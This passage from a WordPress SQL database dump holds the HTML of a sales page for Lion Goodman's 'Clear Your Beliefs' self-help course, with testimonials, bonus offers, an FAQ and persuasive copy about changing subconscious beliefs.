helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() { var is_chrome = window.chrome;  if (is_chrome) {  jQuery(''h5.hdr'').css(''font-size'',''51px''); } });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:37:14', '2014-06-18 02:37:14', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1003, 4194, '2014-06-17 21:41:21', '2014-06-18 02:41:21', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – 